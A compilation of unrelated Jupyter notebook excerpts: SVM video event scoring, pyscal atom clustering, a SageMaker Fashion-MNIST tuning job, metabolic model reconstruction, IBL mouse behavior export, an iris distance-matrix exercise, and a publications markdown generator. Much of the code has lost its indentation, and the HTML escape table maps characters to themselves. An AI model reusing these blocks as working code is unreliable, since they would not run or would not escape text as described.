train_df.fillna(0.0, inplace=True)
### tf_idf conversion
# 1. Save the target column, and drop it from the dataframe
train_df_target = pd.DataFrame(train_df['target'], columns=['target'])
train_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(train_df)
X_train_tf = tf_transformer.transform(train_df)
train_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)
# 3. Add back the target column
train_df = pd.concat([train_df, train_df_target], axis=1)
#a_test_df = pd.read_csv(a_val_file_path, index_col='Unnamed: 0')
#a_test_df.drop(['target', 'name'], axis=1, inplace=True)
m_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')
m_test_df.drop(['name'], axis=1, inplace=True )
#test_df = pd.concat([a_test_df, m_test_df], axis=1)
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
### tf_idf conversion
# 1. Save the target column, and drop it from the dataframe
test_df_target = pd.DataFrame(test_df['target'], columns=['target'])
test_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(test_df)
X_train_tf = tf_transformer.transform(test_df)
test_df = pd.DataFrame(X_train_tf.todense(), columns=test_df.columns.values)
# 3. Add back the target column
test_df = pd.concat([test_df, test_df_target], axis=1)
# Machine Learning
prediction_var = list(train_df.columns)
prediction_var.remove('target')
#prediction_var.remove('name')
# Get input training data
train_X = train_df[prediction_var]
# Get input target variable
train_y = train_df.target
print(train_X.shape)
print(train_y.shape)
# Machine Learning
prediction_var = list(test_df.columns)
prediction_var.remove('target')
# Get test data feature
test_X = test_df[prediction_var]
# Get test data target
test_y = test_df.target
print(test_X.shape)
print(test_y.shape)
# class_weight='balanced',decision_function_shape = 'ovr',
dict_weights = {'P000':0.0000001, 'P001': 97, 'P002': 24, 'P003': 54}
clf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')
# Fit the model to training
clf.fit(train_X,train_y)
# Check prediction accuracy: one-vs-rest average precision for each event class.
# decision_function columns follow the sorted class labels: P000, P001, P002, P003.
prediction = clf.decision_function(test_X)
for col, label in [(1, 'P001'), (2, 'P002'), (3, 'P003')]:
    y_binary = (test_y == label).astype(int)
    print(label, '&', round(average_precision_score(y_binary, prediction[:, col], pos_label=1), 4))
# Train on validation also, for the Canvas submission
m_train_df = pd.read_csv(m_trn_file_path, index_col='Unnamed: 0')
m_train_df.drop(['name'], axis=1, inplace=True)
m_test_df = pd.read_csv(m_val_file_path, index_col='Unnamed: 0')
m_test_df.drop(['name'], axis=1, inplace=True )
train_df = m_train_df
train_df.target.fillna('P000', inplace=True)
train_df.fillna(0.0, inplace=True)
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
train_df = pd.concat([train_df, test_df], ignore_index=True)  # DataFrame.append is deprecated in favor of pd.concat
### tf_idf conversion
# 1. Save the target column, and drop it from the dataframe
train_df_target = pd.DataFrame(train_df['target'], columns=['target'])
train_df.drop(['target'], axis=1, inplace=True )
# 2. Replace frequencies with tf_idf scores
tf_transformer = TfidfTransformer(use_idf=True).fit(train_df)
X_train_tf = tf_transformer.transform(train_df)
train_df = pd.DataFrame(X_train_tf.todense(), columns=train_df.columns.values)
# 3. Add back the target column
train_df = pd.concat([train_df, train_df_target], axis=1)
# Get input training data
train_X = train_df[prediction_var]
# Get input target variable
train_y = train_df.target
m_test_df = pd.read_csv(m_test_file_path, index_col='Unnamed: 0')
name_list = m_test_df['name']
m_test_df.drop(['name'], axis=1, inplace=True )
test_df = m_test_df
test_df.target.fillna('P000', inplace=True)
test_df.fillna(0.0, inplace=True)
# Machine Learning
prediction_var = list(test_df.columns)
prediction_var.remove('target')
# Get test data features
test_X = test_df[prediction_var]
# Get test data target
test_y = test_df.target
clf = svm.SVC(gamma='scale', probability=True, class_weight=dict_weights,decision_function_shape = 'ovr')
# Fit the model to training
clf.fit(train_X,train_y)
with open("../../all_test.video", "r") as f:
video_list = f.readlines()
# Score the test set and write one score file per event class;
# videos without a test-feature row get score 0.0.
prediction = clf.decision_function(test_X)
for col, label in [(1, 'P001'), (2, 'P002'), (3, 'P003')]:
    output_df = pd.DataFrame({"VideoID": name_list, "Label": prediction[:, col]})
    score_lookup = output_df.set_index('VideoID').to_dict('index')
    res = []
    for line in video_list:
        vid = line.strip("\n")
        res.append(score_lookup[vid]['Label'] if vid in score_lookup else 0.0)
    res = pd.DataFrame(res, columns=None)
    res.to_csv(path_or_buf="../scores/" + label + "_cnn.csv", index=False)
```
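The script above evaluates each event class one-vs-rest with `average_precision_score`. A minimal sketch of that evaluation pattern on toy data (the class names and decision values here are made up for illustration):

```python
import numpy as np
from sklearn.metrics import average_precision_score

# One-vs-rest: binarize the labels for a single class, then score
# that class's decision values against the binary ground truth.
y_true = np.array(['P000', 'P001', 'P001', 'P002'])
scores_p001 = np.array([0.1, 0.8, 0.7, 0.2])  # hypothetical decision values for class P001

binary = (y_true == 'P001').astype(int)
ap = average_precision_score(binary, scores_p001)
print(round(ap, 4))  # both positives are ranked first, so AP is 1.0
```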
---
## Distinction of solid liquid atoms and clustering
In this example, we will take one snapshot from a molecular dynamics simulation which has a solid cluster in liquid. The task is to identify solid atoms and cluster them. More details about the method can be found [here](https://pyscal.readthedocs.io/en/latest/solidliquid.html).
The first step is, of course, importing all the necessary modules. For visualisation, we will use [Ovito](https://www.ovito.org/).

The above image shows a visualisation of the system using Ovito. Importing modules,
```
import pyscal.core as pc
```
Now we will set up a System with this input file, and calculate neighbors. Here we will use a cutoff method to find neighbors. More details about finding neighbors can be found [here](https://pyscal.readthedocs.io/en/latest/nearestneighbormethods.html#).
```
sys = pc.System()
sys.read_inputfile('cluster.dump')
sys.find_neighbors(method='cutoff', cutoff=3.63)
```
Once we compute the neighbors, the next step is to find solid atoms. This can be done using the [System.find_solids](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids) method. There are a few parameters that can be set, which are described in detail [here](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.find_solids).
```
sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=False)
```
The above statement found all the solid atoms. Solid atoms can be identified by the value of the `solid` attribute. To do so, we first get the atom objects and select those whose `solid` value is True.
```
atoms = sys.atoms
solids = [atom for atom in atoms if atom.solid]
len(solids)
```
There are 202 solid atoms in the system. In order to visualise them in Ovito, we first need to write them out to a trajectory file. This can be done with the help of the [to_file](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.to_file) method of System, which can save any attribute of the atoms or any Steinhardt parameter value.
```
sys.to_file('sys.solid.dat', custom = ['solid'])
```
We can now visualise this file in Ovito. After opening the file, select the [compute property](https://ovito.org/manual/particles.modifiers.compute_property.html) modifier: set `Output property` to `selection` and enter `solid==0` in the expression field to select all the non-solid atoms. Then apply the [delete selected particles](https://ovito.org/manual/particles.modifiers.delete_selected_particles.html) modifier to remove them. The system after removing all the liquid atoms is shown below.

### Clustering algorithm
You can see that there is a cluster of atoms. The clustering functions that pyscal offers help in this regard. If `find_solids` is called with `cluster=True`, the clustering is carried out in the same step. Since we used `cluster=False` above, we will rerun the function:
```
sys.find_solids(bonds=6, threshold=0.5, avgthreshold=0.6, cluster=True)
```
You can see that the above function call returned the number of atoms belonging to the largest cluster as an output. In order to extract atoms that belong to the largest cluster, we can use the `largest_cluster` attribute of the atom.
```
atoms = sys.atoms
largest_cluster = [atom for atom in atoms if atom.largest_cluster]
len(largest_cluster)
```
The value matches that given by the function. Once again we will save this information to a file and visualise it in Ovito.
```
sys.to_file('sys.cluster.dat', custom = ['solid', 'largest_cluster'])
```
The system visualised in Ovito following similar steps as above is shown below.

It is clear from the image that the largest cluster of solid atoms was successfully identified. Clustering can be done over any property. The following example with the same system will illustrate this.
## Clustering based on a custom property
In pyscal, clustering can be done based on any property. The following example illustrates this. To find the clusters based on a custom property, the [System.cluster_atoms](https://docs.pyscal.org/en/latest/pyscal.html#pyscal.core.System.cluster_atoms) method has to be used. The simulation box shown above has its centre roughly at (25, 25, 25). For the custom clustering, we will cluster all atoms within a distance of 10 from this rough centre of the box. Let us define a function that checks this condition.
```
def check_distance(atom):
#get position of atom
pos = atom.pos
#calculate distance from (25, 25, 25)
dist = ((pos[0]-25)**2 + (pos[1]-25)**2 + (pos[2]-25)**2)**0.5
#check if dist < 10
return (dist <= 10)
```
The above function takes an Atom as its argument and returns True or False depending on a condition; these are the two requirements a custom clustering function must satisfy. Now we can pass this function to `cluster_atoms`. First, set up the system and find the neighbors.
```
sys = pc.System()
sys.read_inputfile('cluster.dump')
sys.find_neighbors(method='cutoff', cutoff=3.63)
```
Now cluster
```
sys.cluster_atoms(check_distance)
```
There are 242 atoms in the cluster! Once again we can check this, save it to a file and visualise it in Ovito.
```
atoms = sys.atoms
largest_cluster = [atom for atom in atoms if atom.largest_cluster]
len(largest_cluster)
sys.to_file('sys.dist.dat', custom = ['solid', 'largest_cluster'])
```

This example illustrates that any property can be used to cluster the atoms!
---
## Download the Fashion-MNIST dataset
```
import os
import numpy as np
from tensorflow.keras.datasets import fashion_mnist
(x_train, y_train), (x_val, y_val) = fashion_mnist.load_data()
os.makedirs("./data", exist_ok = True)
np.savez('./data/training', image=x_train, label=y_train)
np.savez('./data/validation', image=x_val, label=y_val)
!pygmentize fmnist-3.py
```
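A quick way to confirm the `.npz` files were written with the expected keys is to round-trip a tiny array through `np.savez` and `np.load`. A minimal sketch with throwaway data in a temporary directory:

```python
import os
import tempfile

import numpy as np

# tiny stand-in for the image/label arrays saved above
x = np.arange(6, dtype=np.uint8).reshape(2, 3)
y = np.array([0, 1])

path = os.path.join(tempfile.mkdtemp(), 'training.npz')
np.savez(path, image=x, label=y)

# the archive exposes the same keyword names used at save time
with np.load(path) as archive:
    print(archive['image'].shape, archive['label'].tolist())
```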
## Upload Fashion-MNIST data to S3
```
import sagemaker
print(sagemaker.__version__)
sess = sagemaker.Session()
role = sagemaker.get_execution_role()
bucket = sess.default_bucket()
prefix = 'keras2-fashion-mnist'
training_input_path = sess.upload_data('data/training.npz', key_prefix=prefix+'/training')
validation_input_path = sess.upload_data('data/validation.npz', key_prefix=prefix+'/validation')
output_path = 's3://{}/{}/output/'.format(bucket, prefix)
chk_path = 's3://{}/{}/checkpoints/'.format(bucket, prefix)
print(training_input_path)
print(validation_input_path)
print(output_path)
print(chk_path)
```
## Train with Tensorflow
```
from sagemaker.tensorflow import TensorFlow
tf_estimator = TensorFlow(entry_point='fmnist-3.py',
role=role,
instance_count=1,
instance_type='ml.p3.2xlarge',
framework_version='2.1.0',
py_version='py3',
hyperparameters={'epochs': 60},
output_path=output_path,
use_spot_instances=True,
max_run=3600,
max_wait=7200)
objective_metric_name = 'val_acc'
objective_type = 'Maximize'
metric_definitions = [
{'Name': 'val_acc', 'Regex': 'Best val_accuracy: ([0-9\\.]+)'}
]
from sagemaker.tuner import ContinuousParameter, IntegerParameter
hyperparameter_ranges = {
'learning_rate': ContinuousParameter(0.001, 0.2, scaling_type='Logarithmic'),
'batch-size': IntegerParameter(32,512)
}
from sagemaker.tuner import HyperparameterTuner
tuner = HyperparameterTuner(tf_estimator,
objective_metric_name,
hyperparameter_ranges,
metric_definitions=metric_definitions,
objective_type=objective_type,
max_jobs=60,
max_parallel_jobs=2,
early_stopping_type='Auto')
tuner.fit({'training': training_input_path, 'validation': validation_input_path})
from sagemaker.analytics import HyperparameterTuningJobAnalytics
exp = HyperparameterTuningJobAnalytics(
hyperparameter_tuning_job_name=tuner.latest_tuning_job.name)
jobs = exp.dataframe()
jobs.sort_values('FinalObjectiveValue', ascending=0)
```
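The `metric_definitions` regex above is what SageMaker applies to the training log stream to extract the objective value for each job. A quick sketch of the same extraction in plain Python, on a hypothetical log line:

```python
import re

# hypothetical log line of the kind the training script would emit
log_line = "Epoch 60 done. Best val_accuracy: 0.9123"

match = re.search(r'Best val_accuracy: ([0-9\.]+)', log_line)
print(match.group(1))  # the captured group is the metric value as a string
```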
## Deploy
```
import time
tf_endpoint_name = 'keras-tf-fmnist-'+time.strftime("%Y-%m-%d-%H-%M-%S", time.gmtime())
tf_predictor = tuner.deploy(
initial_instance_count=1,
instance_type='ml.m5.large',
endpoint_name=tf_endpoint_name)
```
## Predict
```
%matplotlib inline
import random
import matplotlib.pyplot as plt
num_samples = 5
indices = random.sample(range(x_val.shape[0] - 1), num_samples)
images = x_val[indices]/255
labels = y_val[indices]
for i in range(num_samples):
plt.subplot(1,num_samples,i+1)
plt.imshow(images[i].reshape(28, 28), cmap='gray')
plt.title(labels[i])
plt.axis('off')
payload = images.reshape(num_samples, 28, 28, 1)
response = tf_predictor.predict(payload)
prediction = np.array(response['predictions'])
predicted_label = prediction.argmax(axis=1)
print('Predicted labels are: {}'.format(predicted_label))
```
## Clean up
```
tf_predictor.delete_endpoint()
```
---
```
import mackinac
import cobra
import pandas as pd
import json
import os
import numpy as np
# load ID's for each organisms genome
id_table = pd.read_table('../data/study_strain_subset_w_patric.tsv',sep='\t',dtype=str)
id_table = id_table.replace(np.nan, '', regex=True)
species_to_id = dict(zip(id_table["designation in screen"],id_table["PATRIC genome ID"]))
id_table
mackinac.get_token('gregmedlock_seed')
# grab and save a universal model to be used later for gapfilling. This is a public template available in Mike Mundy's workspace.
# The template says "gramneg", but there is no difference between the g+ and g- templates other than biomass composition,
# which will not be used during gapfilling (the GENREs will already have their own biomass function).
gramneg = mackinac.create_universal_model('/mmundy/public/modelsupport/templates/MicrobialNegativeResolved.modeltemplate')
cobra.io.save_json_model(gramneg,'../data/universal_mundy.json')
# save id's and both names in dictionary
name_to_recon_info = {}
name_to_gapfill_solution = {}
for species in species_to_id.keys():
# Check for an existing GENRE and make sure there is a PATRIC ID for the strain--
# if there is no PATRIC ID, the dictionary will have an empty string for that strain.
if species+'.json' not in os.listdir('../data/modelseed_models') and species_to_id[species]:
species_id = species_to_id[species]
# reconstruct model; function returns a dictionary with reconstruction info, NOT the model
print("Reconstructing GENRE for " + species)
recon_info = mackinac.create_patric_model(species_id,species)
name_to_recon_info[species] = recon_info
# Get the reactions contained in the gapfill solution. This is on complete media
name_to_gapfill_solution[species] = mackinac.get_patric_gapfill_solutions(species)[0]
# convert to a cobra model
model = mackinac.create_cobra_model_from_patric_model(species)
# Save model in json format
cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'.json')
# Save the model with gapfilled reactions removed
gapfilled_reactions = name_to_gapfill_solution[species]['reactions'].keys()
model.remove_reactions(gapfilled_reactions, remove_orphans=True)
model.repair()
cobra.io.save_json_model(model, '../data/modelseed_models/'+species+'_gapfill_removed.json')
# save conversion dict for id:original_name:SEED_name mapping
with open('../data/patric_recon_info.json','w') as jsonfile:
json.dump(name_to_recon_info,jsonfile)
# save the gapfill solutions
with open('../data/patric_gapfill_solutions.json','w') as jsonfile:
json.dump(name_to_gapfill_solution,jsonfile)
species_to_id
```
---
This script loads behavioral mice data (from `biasedChoiceWorld` protocol and, separately, the last three sessions of training) only from mice that pass a given (stricter) training criterion. For the `biasedChoiceWorld` protocol, only sessions achieving the `trained_1b` and `ready4ephysrig` training status are collected.
The data are slightly reformatted and saved as `.csv` files.
```
import datajoint as dj
dj.config['database.host'] = 'datajoint.internationalbrainlab.org'
from ibl_pipeline import subject, acquisition, action, behavior, reference, data
from ibl_pipeline.analyses.behavior import PsychResults, SessionTrainingStatus
from ibl_pipeline.utils import psychofit as psy
from ibl_pipeline.analyses import behavior as behavior_analysis
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import os
myPath = r"C:\Users\Luigi\Documents\GitHub\ibl-changepoint\data" # Write here your data path
os.chdir(myPath)
# Get list of mice that satisfy given training criteria (stringent trained_1b)
# Check query from behavioral paper:
# https://github.com/int-brain-lab/paper-behavior/blob/master/paper_behavior_functions.py
subj_query = (subject.Subject * subject.SubjectLab * reference.Lab * subject.SubjectProject
& 'subject_project = "ibl_neuropixel_brainwide_01"').aggr(
(acquisition.Session * behavior_analysis.SessionTrainingStatus())
# & 'training_status="trained_1a" OR training_status="trained_1b"',
# & 'training_status="trained_1b" OR training_status="ready4ephysrig"',
& 'training_status="trained_1b"',
'subject_nickname', 'sex', 'subject_birth_date', 'institution',
date_trained='min(date(session_start_time))')
subjects = (subj_query & 'date_trained < "2019-09-30"')
mice_names = sorted(subjects.fetch('subject_nickname'))
print(mice_names)
sess_train = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) &
'task_protocol LIKE "%training%"' & 'session_start_time < "2019-09-30"')
sess_stable = ((acquisition.Session * behavior_analysis.SessionTrainingStatus) &
'task_protocol LIKE "%biased%"' & 'session_start_time < "2019-09-30"' &
('training_status="trained_1b" OR training_status="ready4ephysrig"'))
stable_mice_names = list()
# Perform at least this number of sessions
MinSessionNumber = 4
def get_mouse_data(df):
position_deg = 35. # Stimuli appear at +/- 35 degrees
# Create new dataframe
datamat = pd.DataFrame()
datamat['trial_num'] = df['trial_id']
datamat['session_num'] = np.cumsum(df['trial_id'] == 1)
datamat['stim_probability_left'] = df['trial_stim_prob_left']
signed_contrast = df['trial_stim_contrast_right'] - df['trial_stim_contrast_left']
datamat['contrast'] = np.abs(signed_contrast)
datamat['position'] = np.sign(signed_contrast)*position_deg
datamat['response_choice'] = df['trial_response_choice']
datamat.loc[df['trial_response_choice'] == 'CCW','response_choice'] = 1
datamat.loc[df['trial_response_choice'] == 'CW','response_choice'] = -1
datamat.loc[df['trial_response_choice'] == 'No Go','response_choice'] = 0
datamat['trial_correct'] = np.double(df['trial_feedback_type']==1)
datamat['reaction_time'] = df['trial_response_time'] - df['trial_stim_on_time'] # double-check
# Since some trials have zero contrast, need to compute the alleged position separately
datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'position'] = \
datamat.loc[(datamat['trial_correct'] == 1) & (signed_contrast == 0),'response_choice']*position_deg
datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'position'] = \
datamat.loc[(datamat['trial_correct'] == 0) & (signed_contrast == 0),'response_choice']*(-position_deg)
return datamat
# Loop over all mice
for mouse_nickname in mice_names:
mouse_subject = {'subject_nickname': mouse_nickname}
# Get mouse data for biased sessions
behavior_stable = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \
* sess_stable.proj('session_uuid','task_protocol','session_start_time','training_status') * subject.Subject.proj('subject_nickname') \
* subject.SubjectLab.proj('lab_name')
df = pd.DataFrame(behavior_stable.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))
if len(df) > 0: # The mouse has performed in at least one stable session with biased blocks
datamat = get_mouse_data(df)
# Take mice that have performed a minimum number of sessions
if np.max(datamat['session_num']) >= MinSessionNumber:
# Should add 'N' to mice names that start with numbers?
# Save dataframe to CSV file
filename = mouse_nickname + '.csv'
datamat.to_csv(filename,index=False)
stable_mice_names.append(mouse_nickname)
# Get mouse last sessions of training data
behavior_train = (behavior.TrialSet.Trial & (subject.Subject & mouse_subject)) \
* sess_train.proj('session_uuid','task_protocol','session_start_time') * subject.Subject.proj('subject_nickname') \
* subject.SubjectLab.proj('lab_name')
df_train = pd.DataFrame(behavior_train.fetch(order_by='subject_nickname, session_start_time, trial_id', as_dict=True))
datamat_train = get_mouse_data(df_train)
Nlast = np.max(datamat_train['session_num']) - 3
datamat_final = datamat_train[datamat_train['session_num'] > Nlast]
# Save final training dataframe to CSV file
filename = mouse_nickname + '_endtrain.csv'
datamat_final.to_csv(filename,index=False)
print(stable_mice_names)
len(stable_mice_names)
```
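The `get_mouse_data` function above derives the stimulus position from the signed contrast (right minus left). A minimal sketch of that step on made-up trials; note that zero-contrast trials get position 0 here and are filled in from the response choice and feedback type in the full function:

```python
import numpy as np
import pandas as pd

position_deg = 35.0  # stimuli appear at +/- 35 degrees

# hypothetical trials: stimulus on the left, on the right, and zero contrast
df = pd.DataFrame({
    'trial_stim_contrast_left':  [0.25, 0.0, 0.0],
    'trial_stim_contrast_right': [0.0, 0.5, 0.0],
})

signed_contrast = df['trial_stim_contrast_right'] - df['trial_stim_contrast_left']
position = np.sign(signed_contrast) * position_deg
print(position.tolist())  # [-35.0, 35.0, 0.0]
```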
---
# Distance Matrix
```
# imports
# The sklearn library contains a lot of efficient tools for machine learning and statistical modeling including
# classification, regression, clustering and dimensionality reduction
from sklearn import datasets
# used to perform a wide variety of mathematical operations on arrays. It adds powerful data structures to Python
# that guarantee efficient calculations with arrays and matrices
import numpy as np
# abstract
dataset = datasets.load_iris()
# dictionary
dataset.keys()
dataset["feature_names"]
data = dataset["data"]
# data is a numpy array data structure. Think of it as a matrix of data (or as an excel spreadsheet)
print(data.shape)
print(data)
# euclidean distance of 2 observations
p1 = data[50]
p2 = data[100]
sum(((p1 - p2)**2))**(1/2)
# initialize distance matrix. What will be its final shape?
dist = []
# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula
# Iterate over the rows of data
for i in range(data.shape[0]):
dist_row = []
    # Iterate over the rows again; each inner iteration fills one column of the current row
for j in range(data.shape[0]):
single_dist = sum((data[i] - data[j]) ** 2) ** (1/2)
# Append the results to dist_row
dist_row.append(single_dist)
# At the end of the second loop, append list to matrix dist
dist.append(dist_row)
dist
# another import (usually all imports are done at the top of the script/ notebook)
# Open-source Python library built on top of matplotlib. It is used for data visualization and exploratory data analysis.
# Seaborn works easily with dataframes and the Pandas library.
import seaborn as sns
sns.heatmap(dist)
```
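The double loop above runs in pure Python and is O(n²) function calls; the same matrix can be built in one shot with NumPy broadcasting, which is typically much faster. A sketch on a tiny two-point example:

```python
import numpy as np

def distance_matrix_vec(X):
    # Broadcasting: diff[i, j, :] = X[i] - X[j]; square and sum over the feature axis.
    diff = X[:, None, :] - X[None, :, :]
    return np.sqrt((diff ** 2).sum(axis=-1))

# distance between (0, 0) and (3, 4) is 5 (the 3-4-5 triangle)
X = np.array([[0.0, 0.0], [3.0, 4.0]])
print(distance_matrix_vec(X))
```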
# Plotting data:
Don't worry about the code as that's not the objective of the exercise and we will learn how to plot data in future classes
### How can we represent an observation in a N-dimensional Space
```
# plotting library available for the Python programming language as a component of NumPy,
#a big data numerical handling resource. Matplotlib uses an object oriented API to embed plots in Python applications
import matplotlib.pyplot as plt
# 2D scatter plot
plt.scatter(data[:, 0], data[:, 1])
# Eixo x: sepal length
plt.xlabel(dataset["feature_names"][0])
# Eixo y: sepal width
plt.ylabel(dataset["feature_names"][1])
# Show plot
plt.show()
# 1D scatter plot
plt.scatter(data[:, 0], [0 for i in range(data.shape[0])])
# Eixo x: sepal length
plt.xlabel(dataset["feature_names"][0])
plt.show()
# 3D scatter plot
fig = plt.figure(figsize=(14, 7)) # defining a figure so we can add a 3d subplot
# figsize=Width, height in inches
# Used to add an Axes to the figure as part of a subplot arrangement
ax = fig.add_subplot(111, projection="3d")
# 3 columns = 3 dimensions
ax.scatter(data[:, 0], data[:, 1], data[:, 2])
# Labelling the axes
ax.set_xlabel(dataset["feature_names"][0])
ax.set_ylabel(dataset["feature_names"][1])
ax.set_zlabel(dataset["feature_names"][2])
plt.show()
```
## Finding nearest neighbors
```
# Let's start off simple. If we want to find the minimum value we use the following code:
# Initialize these variables outside the loop so their scope is global and we can
# update and track their values at each iteration.
min_args, min_dist = (None, 9e99)
# enumerate keeps track of the row index id_r while we iterate along the rows of dist
for id_r, row in enumerate(dist):
    dist_ = min(row)  # minimum distance in the current row
    if dist_ <= min_dist:
        min_dist = dist_  # if the row minimum is <= the global minimum, update the latter
        min_args = id_r   # and record the row index where the global minimum was found
# Next step. Let's try to additionally find the column index responsible for the minimum global distance.
# Then, together with the row index we can know which observations are closest together (i.e. have the smallest distance):
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist):
dist_ = min(row)
if dist_ <= min_dist:
min_dist = dist_
        for id_c, dist_val in enumerate(row):
            # To find the column index responsible for the current minimum global distance,
            # iterate along the current row; when a distance matches the current minimum,
            # the tracked column index id_c is the one responsible for it.
            if dist_val == dist_:
                min_args = (id_r, id_c)
                break  # column index found, so exit the loop; no need to search any longer
# The way we search for the minimum distance and the corresponding observations is explained. However we have to take care
# of a very important detail. Since the distance matrix is a symmetric and 0-diagonal matrix (distance of the observation
# with itself is 0) we should only perform the search over either the upper or lower triangle of the matrix.
# Let's implement this:
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist):
row_relevant = row.copy()[:id_r] # we define row_relevant as a copy of row that only holds a slice of the values corresponding to the distances in the lower diagonal of the matrix (i.e. excludes value in row corresponding to diagonal and upper triangle as it holds redundant information). We will only look for the minimum distance and the corresponding observations in these values
dist_ = min(row_relevant) if len(row_relevant)>0 else 9e99 # the if condition ensures we do not call the min() function on an empty list (happens at first iteration when id_r = 0)
if dist_<=min_dist:
min_dist = dist_
for id_c, dist_val in enumerate(row_relevant):
if dist_val == dist_:
min_args = (id_r, id_c)
break
min_dist
min_args
print(data[min_args[0]])
print(data[min_args[1]])
print('minimum distance:\t', min_dist)
```
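The same lower-triangle minimum search can be cross-checked with a vectorized NumPy version. This is a hedged sketch: the small `dist` array below is a stand-in for the distance matrix built earlier, so the snippet runs on its own.

```python
import numpy as np

# Stand-in for the distance matrix built earlier (symmetric, zero diagonal)
dist = np.array([[0.0, 2.0, 5.0],
                 [2.0, 0.0, 1.0],
                 [5.0, 1.0, 0.0]])

# Keep only the strict lower triangle; mask everything else with infinity
masked = np.where(np.tri(len(dist), k=-1, dtype=bool), dist, np.inf)

# argmin over the flattened array, then convert back to (row, col)
id_r, id_c = (int(i) for i in np.unravel_index(np.argmin(masked), masked.shape))
print((id_r, id_c), masked[id_r, id_c])  # (2, 1) 1.0
```

The result matches the loop-based search: observations 2 and 1 are the closest pair.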
## Define functions
Why do we want to define functions in this case?
```
def distance_matrix(data):
dist = []
# Build the distance matrix. Use 2 for loops, the append list method and the euclidean distance formula
for i in range(data.shape[0]):
dist_row = []
for j in range(data.shape[0]):
            single_dist = (sum((data[i] - data[j]) ** 2)) ** 0.5 # note: ** binds tighter than /, so '** 1/2' would halve the sum instead of taking its square root
dist_row.append(single_dist)
dist.append(dist_row)
return dist
def closest_points(dist_matrix):
# get variables to save closest neighbors later
min_args, min_dist = (None, 9e99)
for id_r, row in enumerate(dist_matrix):
row_ = row.copy()[:id_r]
dist = min(row_) if len(row_)>0 else 9e99
# check if the row's min distance is the lowest distance found so far
if dist<=min_dist:
# save points' ids and their distance
min_dist = dist
for id_diag, dist_val in enumerate(row_):
if dist_val==dist:
min_args = (id_diag, id_r)
break
return min_args, min_dist
```
## Finding the `n` shortest distances
```
dist_matrix = distance_matrix(data)
n_distances = 10
distances = []
for _ in range(n_distances):
# return min_args, min_dist
c_points = closest_points(dist_matrix)
# append to list distances
distances.append(c_points)
    # Overwrite the found entry with a huge value so the next pass finds the next shortest distance
    dist_matrix[c_points[0][1]][c_points[0][0]] = 9e99
distances
```
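An alternative to repeatedly overwriting found entries with `9e99` is to enumerate the lower triangle once and let `heapq.nsmallest` pick the `n` shortest distances. A self-contained sketch with a small stand-in matrix:

```python
import heapq

# Small stand-in distance matrix (symmetric, zero diagonal)
dist_matrix = [[0, 3, 1],
               [3, 0, 2],
               [1, 2, 0]]

# Enumerate only the strict lower triangle: ((row, col), distance) pairs
pairs = [((i, j), dist_matrix[i][j])
         for i in range(len(dist_matrix)) for j in range(i)]

# Take the n smallest in one pass, with no mutation of the matrix
shortest = heapq.nsmallest(2, pairs, key=lambda p: p[1])
print(shortest)  # [((2, 0), 1), ((2, 1), 2)]
```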
# Publications markdown generator for academicpages
Takes a TSV of publications with metadata and converts them for use with [academicpages.github.io](academicpages.github.io). This is an interactive Jupyter notebook ([see more info here](http://jupyter-notebook-beginner-guide.readthedocs.io/en/latest/what_is_jupyter.html)). The core python code is also in `publications.py`. Run either from the `markdown_generator` folder after replacing `publications.tsv` with one containing your data.
TODO: Make this work with BibTex and other databases of citations, rather than Stuart's non-standard TSV format and citation style.
## Data format
The TSV needs to have the following columns: pub_date, title, venue, excerpt, citation, url_slug, site_url, and paper_url, with a header at the top.
- `excerpt` and `paper_url` can be blank, but the others must have values.
- `pub_date` must be formatted as YYYY-MM-DD.
- `url_slug` will be the descriptive part of the .md file and the permalink URL for the page about the paper. The .md file will be `YYYY-MM-DD-[url_slug].md` and the permalink will be `https://[yourdomain]/publication/YYYY-MM-DD-[url_slug]`
This is how the raw file looks (it doesn't look pretty, use a spreadsheet or other program to edit and create).
```
!cat publications.tsv
```
## Import pandas
We are using the very handy pandas library for dataframes.
```
import pandas as pd
```
## Import TSV
Pandas makes this easy with the read_csv function. We are using a TSV, so we specify the separator as a tab, or `\t`.
I found it important to put this data in a tab-separated values format, because there are a lot of commas in this kind of data and comma-separated values can get messed up. However, you can modify the import statement, as pandas also has read_excel(), read_json(), and others.
```
publications = pd.read_csv("publications.tsv", sep="\t", header=0)
publications
```
## Escape special characters
YAML is very picky about what it takes as a valid string, so we are replacing single and double quotes (and ampersands) with their HTML-encoded equivalents. This makes them look not so readable in raw format, but they are parsed and rendered nicely.
```
html_escape_table = {
"&": "&",
'"': """,
"'": "'"
}
def html_escape(text):
"""Produce entities within text."""
return "".join(html_escape_table.get(c,c) for c in text)
```
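For example, a citation containing an ampersand and quotes becomes YAML-safe after escaping (the table and helper are repeated here so the snippet runs on its own):

```python
# Same escape table and helper as above, repeated for a self-contained example
html_escape_table = {"&": "&amp;", '"': "&quot;", "'": "&apos;"}

def html_escape(text):
    """Produce entities within text."""
    return "".join(html_escape_table.get(c, c) for c in text)

print(html_escape('Smith & Jones, "On YAML-safe strings"'))
# Smith &amp; Jones, &quot;On YAML-safe strings&quot;
```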
## Creating the markdown files
